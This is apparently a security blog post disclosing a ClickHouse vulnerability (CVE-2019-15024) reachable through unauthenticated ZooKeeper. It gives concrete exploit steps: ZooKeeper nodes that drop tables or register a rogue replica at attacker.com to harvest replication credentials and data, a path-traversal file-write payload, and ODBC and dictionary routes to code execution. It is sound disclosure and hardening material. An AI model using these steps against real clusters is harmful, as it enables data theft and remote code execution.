Why keep your Zoo doors closed

5 min readJul 17, 2020

Here is a story of one specific vulnerability in ClickHouse (CVE-2019–15024) replication protocol but it also illustrates how the increase of attack surface can be exploited.

ClickHouse is a database for storing large amounts of data, most often using more than one replica. Clustering and replication in ClickHouse is built over Apache ZooKeeper (ZK) and requires rw access.

Default ZK installation does not require authentication and thousands of ZK servers managing Kafka, Hadoop, ClickHouse etc. configurations are publically available.

To decrease the attack surface you should always configure authentication and authorization for you ZooKeeper installation.

There are some Java deserialization 0days burried, but imagine that an attacker can read and write to the ZooKeeper you use for ClickHouse replication.

When configured in cluster mode ClickHouse supports distributed DDL requests, such requests are passed through ZK — for them nodes are created in the leaf /clickhouse/task_queue/ddl

For example you create node /clickhouse/task_queue/ddl/query-0001 with content

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

then on hosts host1 and host2 of cluster test table xxx will be dropped. DDL allows to run CREATE/ALTER/DROR queries.

Sounds scary? But where an attacker can get host addresses?

ClickHouse replication works at the level of an individual table. Thus, when creating a table, a node is specified in ZK that will be used to exchange metadata with replicas.
For example, when performing a query (ZK must be configured, chXX is replica name, foobar table name)

CREATE TABLE foobar
(
	`action_id` UInt32 DEFAULT toUInt32(0),
	`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

columns and metadata nodes will be created.

/clickhouse/tables/01/foobar/replicas/chXX/hosts

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Can data be exfiltrated from this cluster? Yes, if replication port (TCP/9009) on server chXX-address is not behind a firewall and no authentication configured for replication. How to bypass the authentication?

Attacker can create a new replica node in ZK — just copy all the content from /clickhouse/tables/01-01/foobar/replicas/chXX and change host value

/clickhouse/tables/01–01/foobar/replicas/attacker/host

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Then tell the other replicas that he has a new data block and ask them to take it from attackers host — create a ZK node /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX is monotonically growing counter has to be bigger than the last log entries)

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

source_replica — name of previously created attacker’s replica

block_id — data block identifier
get — command “get block” (and other operations)

After that each of the replicas will read a new log entry and go to the server under attackers control to retrieve the specified block of data (replication protocol binary over HTTP). The attacker.com server will receive requests

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

where XXX is replication auth data. In some cases it may be an account with access to DB via native and HTTP protocols.
As you can see from the above — the surface for the attack has increased dramatically because the ZooKeeper used for replication has been left unauthenticated.

Let’s take a look at the function of receiving a block of data from a replica, it is clearly written with the expectation that all the replicas are controlled and there is trust between them.

The function reads the number of files, then their names, size, content and puts it on fs. It is worth to describe separately how the data itself is stored in terms of fs.

There are several subdirectories in /var/lib/clickhouse (default, defined by config):

flags — you can put data loss recovery flags in this directory
tmp — for temporary files
user_files — operations with files in queries are limited to this directory (INTO OUTFILE etc.)
metadata — sql files with table descriptions
preprocessed_configs — processed config derivatives from /etc/clickhouse-server
data — the data itself, in this case a separate directory is simply created for each database (/var/lib/clickhouse/data/default).

For each table a subdirectory with the table name is created in the database directory. For each column there is its own file in the engine-dependent format.
For example, for the foobar table created by attacker there will be created files (by column name + service):

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

Replica is waiting to receive files with the same names for the replicated data block and does not check it in any way.

An attentive reader has already noticed an unsafe file_name concatenation in the WriteBufferFromFile call.
Yes, this allows an attaker to write arbitrary content to arbitrary file on FS with clickhouse user rights.
To achieve this, the replica controlled by the attacker must return to the HTTP response (hex and line breaks added for clarity):

\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper

and after concatenation with ../../../../../../../../../tmp/pwned there will be path traversal an hellofromzookeeper will be written to /tmp/pwned.

There are multiple methods to exploit arbitary FS write to RCE.

External dictionaries to RCE

In older versions, the directory with ClickHouse configurations owned by the clickhouse user by default. ClickHouse configuration files are XML files, the daemon reads them on start and cache at /var/lib/clickhouse/preprocessed_configs. Rereads confids on changes. Controlling /etc/clickhouse-server an attacker can create own external dictionary of executable type and execute arbitrary code.
Current versions of ClickHouse don’t give permissions by default, but if server have been upgrading gradually such permissions may have remained. If you are administering a ClickHouse cluster — check the permissions on the config directory, it must belong to user root.

ODBC to RCE

When creating a clickhouse user in the server package, the “do not create /nonexistent home directory” is explicitly set. However, when using external dictionaries or for some other reason, administrators sometimes create the /nonexistent directory and give clickhouse write permissions on it.

ClickHouse supports ODBC and is able to connect other databases. In ODBC you can specify the path to the database driver library (so). Older versions of ClickHouse allowed to operate this nuance directly from the query processor, but strict validation of the connection string as added to odbc-bridge and now it is not possible to specify the path to the driver file from the query. But if an attacker can write to the server’s home directory (/nonexsitent) using the vulnerability described above?

Create an .odbc.ini file with the contents of

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

then while runing SELECT * FROM odbc('DSN=lalala', 'test', 'test'); test.so will be loaded and RCE achieved (thanks to @buglloc for the tip).

This and other vulnerabilities were fixed in ClickHouse version 19.14.3. Keep your ClickHouse and ZooKeepers safe!

Why keep your Zoo doors closed

Written by kyprizel